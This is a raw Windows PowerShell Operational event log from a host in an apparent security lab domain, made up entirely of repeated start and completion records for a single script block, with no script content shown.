EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476215
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476214
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476213
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476212
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476211
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476210
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476209
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476208
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476207
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476206
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476205
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476204
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476203
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476202
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476201
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476200
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476199
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476198
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476197
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476196
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476195
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476194
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476193
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476192
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476191
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476190
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476189
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476188
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476187
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476186
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476185
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476184
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476183
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476182
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476181
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476180
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476179
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476178
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476177
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476176
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476175
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476174
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476173
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476172
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476171
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476170
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476169
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476168
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476167
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476166
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476165
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476164
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476163
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476162
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
